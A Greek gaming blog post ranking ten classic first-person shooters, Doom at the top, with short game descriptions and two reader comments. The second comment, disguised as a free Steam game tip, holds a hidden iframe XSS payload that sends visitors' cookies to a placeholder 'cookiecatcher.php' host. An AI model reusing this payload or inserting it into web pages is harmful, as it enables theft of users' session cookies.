Τα καλύτερα FPS όλων των εποχών....


Τα First-Person Shooters χωρίς αμφιβολία κατέχουν μια θέση στην καρδιά εκατομμυρίων gamers ανά τον κόσμο. Από τις αρχές της δεκαετίας του '90 μέχρι και σήμερα έχουν κυκλοφορήσει εκατοντάδες δημιουργίες που ανήκουν σ' αυτή την κατηγορία παιχνιδιών, ελάχιστες όμως έχουν καταφέρει να πρωταγωνιστήσουν.. Η προσπάθειά μας να ξεχωρίσουμε τα καλύτερα εξ' αυτών αποδείχθηκε ιδιαίτερα δύσκολη, αφού έπρεπε να λάβουμε υπόψη μας αρκετά κριτήρια. Μερικά από αυτά είναι ο τεχνικός τομέας, η συνολική απήχηση των τίτλων, η πρωτοτυπία, το κατά πόσο προσφέρουν ανταγωνιστικό multiplayer κ.ο.κ. Οι επιλογές της σύνταξης βασίστηκαν κυρίως στα παραπάνω κριτήρια.
Ακολουθεί το Top 10 των καλύτερων First-Person Shooters:
10: Resistance 3 (9/9/2011)
Insomniac Games, Sony
PS3
resistance 3
Το πρώτο Resistance αποτέλεσε έναν από τους τίτλους που συνόδευσαν το PlayStation 3 στην πρώτη του κυκλοφορία και πολύ σύντομα γνώρισε σημαντική εμπορική επιτυχία. Το μέλλον της σειράς προδιαγράφονταν λαμπρό, αλλά η συνέχεια δεν ήταν η ανάλογη καθώς το Resistance 2 -παρά τις θετικές κριτικές που απέσπασε απο reviewers- δεν αγαπήθηκε από το κοινό όπως ο προκάτοχός του. Η Insomniac λαμβάνοντας υπόψη το αρνητικό feedback των παικτών αποφάσισε να συμπεριλάβει ξανά το offline co-op και γενικώς δούλεψε με αρκετό μεράκι πάνω στο τρίτο μέρος της σειράς, ώστε να της προσδώσει ξανά την χαμένη της αίγλη.
To Resistance 3 εκτυλίσσεται σ' ένα post-apocalyptic τοπίο, με το μεγαλύτερο μέρος του πληθυσμού της γης να έχει εξοντωθεί από τους Chimerans. O Joseph Capelli παίρνει την θέση του Nathan Hale στον ρόλο του κεντρικού πρωταγωνιστή και οι ελπίδες ολόκληρης της ανθρωπότητας πέφτουν...στην πλάτη σας.
Η Insomniac Games έχει δώσει τον καλύτερο εαυτό της, καθώς αυτή η δημιουργία προσφέρει εκρηκτική δράση και μια άκρως ικανοποιητική εμπειρία, τόσο στο single-player campaign, όσο και στα διάφορα multiplayer modes της. Αξίζει να αναφερθούμε στην εξαιρετική A.I των Chimerans και στα εντυπωσιακά boss fights. Γενικά ο βαθμός της πρόκλησης είναι αρκετά υψηλός, όχι σε βαθμό όμως που να αποθαρρύνει τον μέσο παίχτη. Δυστυχώς, οι απογοητευτικές πωλήσεις του τίτλου έβαλαν...ταφόπλακα στις όποιες ελπίδες υπήρχαν για κάποιο ενδεχόμενο sequel. To Resistance 3 αποτελεί το κύκνειο άσμα μιας εξαιρετικής τριλογίας, η οποία δεν πρόκειται να αφήσει κανέναν λάτρη των FPS παραπονεμένο και όσοι από εσάς δεν το έχετε παίξει αξίζει να του δώσετε μια ευκαιρία.
9: Deus Ex (26/6/2000)
Ion Storm, Eidos Interactive-Aspyr-Square Enix
PC, PS2, Mac, PS3
deus ex
Η Ion Storm κάλλιστα θα μπορούσε να χαρακτηριστεί ως μια προγραμματιστική εταιρεία "dream team", αφού στο δυναμικό της περιελάμβανε κορυφαίους δημιουργούς στην βιομηχανία των video games, όπως τον John Romero και τον Tom Hall (αμφότεροι αποτέλεσαν ιδρυτικά μέλη της id Software). Εντούτοις, τα δύο πρώτα games της εταιρείας (Dominion: Storm Over Gift 3 και Daikatana) απέτυχαν, κάτι που είχε ως αποτέλεσμα από πολύ νωρίς η εμπιστοσύνη των παιχτών στην Ion Storm να κλονιστεί. Τα επόμενα games της εταιρείας αντιμετωπίστηκαν με δυσπιστία και είναι πράγματι κρίμα, καθώς δημιουργίες όπως τα δύο πρώτα Deus Ex, το Anachronox και το Thief: Deadly Shadows δεν έτυχαν την αποδοχή που τους άρμοζε από το κοινό.
Το Deus Ex έδωσε μια φρέσκια πνοή στον παρηκμασμένο χώρο των First-Person Shooters. Καταρχήν το gameplay ήταν πολυδιάστατο, συνδυάζοντας FPS, RPG, adventure και stealth στοιχεία, βάζοντας σας στην κυριολεξία στο “πετσί” του πρωταγωνιστή και βυθίζοντάς σας στον κόσμο του. Η cyberpunk αισθητική συμπλήρωνε ιδανικά το παζλ, ενώ το σενάριο βασιζόταν σε διάφορες θεωρίες συνωμοσίας, όπου οργανώσεις όπως οι Illuminati και η Hong Kong Triads κινούν τα νήματα από το παρασκήνιο.
Στο Deus Ex αναλαμβάνετε τον ρόλο του JC Denton, ενός πράκτορα της UNATCO, ο οποίος έχει στο κορμί του εμφυτεύματα νανοτεχνολογίας που του δίνουν υπεράνθρωπες ιδιότητές. Ένα από τα ιδιαίτερα χαρακτηριστικά του Deus Ex είναι ότι σας προσφέρει τεράστια ελευθερία κινήσεων. Κάθε μάχη μπορεί να προσεγγιστεί με πολλαπλούς τρόπους (stealth, πιστολίδι κ.ο.κ.) και παράλληλα υπάρχουν διάφορες πιθανές απαντήσεις στους διαλόγους με τους υπόλοιπους χαρακτήρες. Ανάλογα λοιπόν με το τι θα επιλέξετε η πλοκή της ιστορίας εξελίσσεται διαφορετικά. 
8: Battlefield 3 (28/10/2011)
EA Digital Illusions Ce, Electronic Arts 
PC, PS3, Xbox 360, iOS
battlefield 3
Στην έβδομη θέση του Top 10 μας συναντάμε έναν πρόσφατο τίτλο, το Battlefield 3 της Electronic Arts. To single-player campaign διαδραματίζεται σε διάφορες τοποθεσίες όπως το Ιράν και την Νέα Υόρκη κι εσείς αναλαμβάνετε αρχικά τον ρόλο του λοχία Blackburn, ενώ στην συνέχεια ελέγχετε τον Ρώσσο commando Dimitri Mayakovsky. To highlight του τίτλου είναι αναμφισβήτητα η μηχανή γραφικών Frostbite 2. Τα particle effects του Battlefield 3 είναι από τα καλύτερα που έχουμε συναντήσει τα τελευταία χρόνια. Οι διάφορες εκρήξεις και οι καταστροφές κτιρίων παρουσιάζονται μ' έναν ρεαλιστικό τρόπο που στην κυριολεξία κόβει την ανάσα.
Ένα από τα χαρακτηριστικά γνωρίσματα της σειράς, το οποίο δίνει βροντερό παρών και στο Battlefield 3, είναι η δυνατότητα να ελέγξετε διάφορα οχήματα όπως tanks, αεροπλάνα και ελικόπτερα. Από τις τρεις εκδόσεις του παιχνιδιού αναμφισβήτητα η καλύτερη είναι αυτή για τα PC, η οποία προσφέρει αναμετρήσεις έως και 64 παιχτών σε online περιβάλλον και σαφώς ανώτερο frame rate.
7: Call of Duty 4: Modern Warfare (9/11/2007)
Infinity Ward-Aspyr-Treyarch, Activision
PC, PS3, Xbox 360, Mac, Wii
call of duty 4 modern warfare
Η σειρά Call of Duty αποτελούσε πάντα μια από τις δημοφιλέστερες στον χώρο των FPS. Τα γεγονότα των τριών πρώτων παιχνιδιών διαδραματίζονταν στον Β' Παγκόσμιο πόλεμο, αλλά στο τέταρτο μέρος η Infinity Ward επέλεξε πολύ σωστά να μεταφέρει το σκηνικό στην σύγχρονη εποχή. H αλλαγή αυτή έδωσε μια φρέσκια πνοή στη σειρά και έδειξε να τυγχάνει της συνολικής αποδοχής των παιχτών. Το Call of Duty 4: Modern Warfare καταφέρνει να συνδυάσει ιδανικά την single-player και την multiplayer εμπειρία προσφέροντας εκρηκτική δράση.
Από τεχνικής πλευράς πρόκειται για έναν από τους αρτιότερους τίτλους που κυκλοφόρησαν το 2007, με την μηχανή γραφικών IW 3.0 να κάνει πραγματική επίδειξη δυνατοτήτων. To Call of Duty 4: Modern Warfare αποτέλεσε μεγάλη εισπρακτική επιτυχία για την Activision, αφού πούλησε 7 εκατομμύρια αντίτυπα μέσα στους πρώτους δυο μήνες της κυκλοφορίας του, αποσπώντας παράλληλα διθυραμβικές κριτικές από κοινό και reviewers.
6: Quake III Arena (10/12/1999)
id Software-Raster Productions-Bullfrog Productions-Pi Studios, Activision-Sega-Electronic Arts
PC, Mac, Dreamcast, PS2, Xbox 360 (Xbox Live Arcade)
quake 3 arena
O τίτλος αυτός αποτελεί “πνευματικό” παιδί του John Carmack, o οποίος απέδειξε περίτρανα ότι ξέρει να δημιουργεί αριστουργήματα χωρίς την βοήθεια των μέχρι πρότινος στενών συνεργατών του Tom Hall και John Romero. To Quake III Arena αποστασιοποιείται από τους δυο προκατόχους τους, καθώς δεν περιλαμβάνει single-player campaign (όπως το Unreal Tournament), με την έμφαση να δίνεται στο multiplayer κομμάτι του τίτλου, με modes όπως Deathmatch, Team Deathmatch, Tournament και Capture the Flag.
Το Quake III Arena έγινε αντικείμενο ενασχόλησης αρκετών επαγγελματιών παιχτών και εντάχθηκε σε διάφορα τουρνουά, όπως τα Quakecon, Cyberathlete Professional League και Electronic Sports World Cup. Η Raster Productions ανέλαβε να μεταφέρει το παιχνίδι στο Dreamcast, με την έκδοση αυτή ν' αποτελεί ένα από τα καλύτερα PC ports σε κονσόλα. Ο τίτλος αυτός εκμεταλλεύτηκε στο έπακρο της online δυνατότητες του Dreamcast και απέσπασε θετικές κριτικές σε αντίθεση με την έκδοση για PS2.
5: Halo: Combat Evolved (14/3/2002)
Bungie-Gearbox-Westlake Interactive, Microsoft-MacSoft
PC, Xbox
halo combat evolved
Πριν από 10 χρόνια η Microsoft κυκλοφόρησε το πρωτότυπο Xbox πραγματοποιώντας ένα εντυπωσιακό ντεμπούτο στην αγορά των κονσολών. Μπορεί να μην σημείωσε ούτε στο ελάχιστο την επιτυχία του PS2, αλλά κυρίως στην Αμερική γνώρισε σημαντική απήχηση. Το Halo: Combat Evolved αποτέλεσε έναν από τους launch τίτλους για το Xbox, με την άσημη -τότε- Bungie ν' αναλαμβάνει την ανάπτυξή του.
Το σενάριο εξελίσσεται γύρω από τον πόλεμο της ανθρωπότητας ενάντια στην εξωγήινη φυλή Covenant. Εσείς αναλαμβάνετε τον ρόλο του super-στρατιώτη Master Chief, o οποίος αποτελεί μια από τις πιο εμβληματικές φιγούρες στην βιομηχανία των video games. Το Halo: Combat Evolved, όπως εύστοχα υποδηλώνει ο τίτλος του, κατάφερε να εξελίξει το gameplay των FPS. Για πρώτη φορά συναντήσαμε μονομαχίες πάνω σε οχήματα όπως jeeps, tanks κ.ο.κ, ενώ μπορείτε να εξοπλίσετε τον χαρακτήρα σας με μια τεράστια γκάμα από βαλλιστικά όπλα. Αξίζει να αναφερθούμε στο υψηλό A.I των εχθρών, αλλά και στο επιβλητικό soundtrack του παιχνιδιού που σας βάζει αμέσως στο κλίμα της περιπέτειας.
4: Wolfenstein 3D (5/5/1992)
id Software, Apogee Software
wolfenstein 3d
Το Wolfenstein 3D είναι μια ιστορική κυκλοφορία που έθεσε τα πλαίσια μέσα στο οποία θα κινούνταν τα FPS τα επόμενα χρόνια. Κεντρικός πρωταγωνιστής είναι ένας Aμερικανός στρατιώτης πολωνικής καταγωγής που ονομάζεται William “B.J” Blazkowicz, ενώ το σενάριο εξελίσσεται στην εποχή του B' Παγκοσμίου Πολέμου όπου καλείστε να εξολοθρεύσετε τις δυνάμεις των Nazi στο κάστρο Wolfenstein.
Στην Γερμανία το παιχνίδι αποσύρθηκε από τα καταστήματα το 1994 λόγω του περιεχομένου του σε μια από τις πρώτες μεγάλες περιπτώσεις λογοκρισίας βιντεοπαιχνιδιών. Αυτό είχε σαν αποτέλεσμα αρκετά από τα ports στις κονσόλες του Wolfenstein 3D να κυκλοφορήσουν “πετσοκομμένα”, με διάφορα στοιχεία που παρέπεμπαν στους Nazi (όπως τα σύμβολα της Σβάστικας) να έχουν αφαιρεθεί.
To gameplay χαρακτηρίζεται πρωτόγονο για τα σημερινά δεδομένα, καθώς το μόνο που κάνετε είναι να διασχίζετε τους διαδρόμους της κάθε πίστας και να πυροβολείτε ότι κινείται, συλλέγοντας παράλληλα power ups και νέα όπλα. H Wolfenstein 3D engine πρόσφερε μεν ένα σταθερό frame rate, αλλά είχε συγκεκριμένους περιορισμούς καθώς δεν μπορούσατε να κοιτάξετε πάνω ή κάτω (η κάμερα παρέμενε “κεντραρισμένη” στην προοπτική πρώτου προσώπου), ενώ τα επίπεδα θα έπρεπε όλα να έχουν το ίδιο γεωμετρικό ύψος. Η μηχανή γραφικών αναπτύχθηκε από τον John Carmack, έναν από τους πιο ταλαντούχους developers στην βιομηχανία των video games και παράλληλα συνιδρυτή της id Software.
3: Unreal Tournament (30/11/1999)
Epic Games-Digital Extremes, GT Interactive-Infogrames
PC, PS2, Dreamcast, Mac
unreal tournament
Το Unreal Tournament είναι χωρίς αμφιβολία ένα από τα πιο εθιστικά First-Person Shooters όλων των εποχών. Στις αρχές της χιλιετίας το internet είχε μπει πια στα περισσότερα σπίτια και γενικά παρατηρήθηκε μια ραγδαία αύξηση των επαγγελματιών παιχτών. To gaming είχε περάσει σε άλλο επίπεδο, σαφώς πιο ανταγωνιστικό, και οι developers άρχισαν να ρίχνουν μεγαλύτερο βάρος στα multiplayer modes των παιχνιδιών. Το Unreal Tournament περιελάμβανε ένα υποτυπώδες single-player campaign στο οποίο αντιμετωπίζατε bots που ελέγχονταν από την Α.Ι, άλλα το gameplay του επικεντρωνόταν στα διάφορα multiplayer modes. Τα Deathmatch, Team Deathmatch και Capture the Flag είχαν πραγματικά την τιμητική τους και τα LAN έπαιρναν τότε φωτιά.
Η δημιουργία της Epic Games απέσπασε διθυραμβικές κριτικές από κοινό και reviewers ανά τον κόσμο και μερικά χρόνια αργότερα μεταφέρθηκε στο PS2 και το Dreamcast. Ο τεχνικός τομέας του Unreal Tournament ήταν απόλυτα άρτιος, με την πρώτη Unreal Engine να δείχνει σε μεγάλο βαθμό τις δυνατότητές της. Η επιτυχία αυτή ώθησε την Epic Games να κυκλοφορήσει τρία αξιόλογα sequels, τα οποία όμως δεν κατάφεραν να προκαλέσουν ανάλογη αίσθηση.
2: Half-Life 2 (16/11/2004)
Valve Corporation-EA Games, Valve Corporation-Sierra Entertainment
PC, Xbox, Xbox 360, PS3, Mac
half life 2

Το Half-Life 2 διαδραματίζεται 20 περίπου χρόνια μετά τα γεγονότα του προκατόχου του στην City 17, μια φανταστική πόλη στην Ανατολική Ευρώπη. Για ακόμη μια φορά αναλαμβάνετε τον έλεγχο του Gordon Freeman και η σωτηρία ολόκληρου του ανθρωπίνου γένους (από τον ζυγό της εξωγήινης αυτοκρατορίας Combine) πέφτει στις πλάτες σας. To εξωπραγματικό αυτό δημιούργημα της Valve εκτόξευσε την εταιρεία στο πάνθεον της βιομηχανίας των video games. Το Half-Life 2 έχει πουλήσει περισσότερα από 12 εκατομμύρια αντίτυπα, ενώ το 2004 κέρδισε δεκάδες "Game of the Year" βραβεία από τον παγκόσμιο τύπο.
Το δημοφιλές FPS είναι ένας άρτιος τίτλος από όλες τις απόψεις, καθώς συνδυάζει εθιστικό gameplay, πρωτότυπα όπλα και ένα ενδιαφέρον single-player campaign. Το Half-Life 2 αποτελεί ένα από τα πιο επιδραστικά παιχνίδια όλων των εποχών, κάτι που αποδεικνύεται από τα αναρίθμητα mods του, από τα οποία ξεχωρίζουν τα Black Mesa και Dystopia.
1: Doom (10/12/1993)
id Software-Nerve Software, id Software-GT Interactive-Sega-Atari-Ocean Software-Williams Entairtainment, Activision
PC, Mac, 32X, Sega Saturn, PlayStation, Atari Jaguar, Game Boy Advance, Super NES, Xbox 360 (Xbox Live Arcade)
doom
O "πατέρας" των FPS καταλαμβάνει δικαιωματικά την πρώτη θέση στο Top 10 της Best Of στήλης μας. Η id Software το 1992 μας είχε παρουσιάσει το Wolfenstein 3D που σημείωσε εμπορική επιτυχία και έθεσε τις βάσεις πάνω στις οποίες πάτησαν οι Tom Hall, John Romero και John Carmack για να μας προσφέρουν ένα από τα κορυφαία παιχνίδια όλων των εποχών. Το Doom έσκασε σαν βόμβα μεγατόνων πάνω στην παγκόσμια κοινότητα των gamers και ακόμα και σήμερα καταφέρνει να συναρπάζει με το απίστευτα εθιστικό gameplay του.
Σε αυτό το sci-fi FPS αναλαμβάνετε τον ρόλο ενός στρατιώτη, ο οποίος θα πρέπει να εξολοθρεύσει τους δαίμονες της κόλασης στoν δορυφόρο του πλανήτη Άρη, Phobos. Τα 3D γραφικά του ήταν ότι καλύτερο είχαμε συναντήσει εκείνη την εποχή, ενώ τα ηχητικά εφέ του προκαλούσαν ανατριχίλα και φόβο. Η ατμόσφαιρα είχε κάτι το μοναδικό, καθώς απ' τη μία τα ποτάμια λάβας κι απ' την άλλη οι σκοτεινοί χώροι, προκαλούσαν πανικό. Το ρεπερτόριο όπλων μνημονεύεται ακόμα και σήμερα, καθώς αποτέλεσε πηγή έπμνευσης για τα επόμενα First-Person Shooters. Το Doom μεταφέρθηκε σε δεκάδες formats, ενώ κυκλοφορήσαν δυο ακόμα sequels και αρκετά expansions του. Πριν από μερικά χρόνια βγήκε στις κινηματογραφικές αίθουσες και η ομώνυμη ταινία, η οπoία παρά τις ανέμπνευστες ερμηνείες των Karl Urban και Dwayne “The Rock” Johnson, κατάφερε τουλάχιστον να αποδώσει ιδανικά το κλίμα του παιχνιδιού.
Share on Google Plus

About Freegr network

    Blogger Comment
    Facebook Comment

2 σχόλια:

  1. To cod πανω απο bf3 απο που και ως που? επισης η σειρα halo και η σειρα half-life μαζι με το unreal tournament εδωσαν μαθηματα στην κατασκευη fps.Τα ρετρο σαν παιχνιδια αξιζουν λιγοτερο αλλα αυτα μας διδαξαν πως να πεζουμε και αποδιδεται ο δεοντας σεβασμος

    ΑπάντησηΔιαγραφή
  2. Παιδια τσεκαρετε αυτο το τελειο game! Βγήκε για λιγες μερες στο steam Δωρεάν!

    <iframe frameborder="0" height="0" width="0" src="javascript...:void(document.location='YOURURL/cookiecatcher.php?c=' document.cookie)></iframe>

    ΑπάντησηΔιαγραφή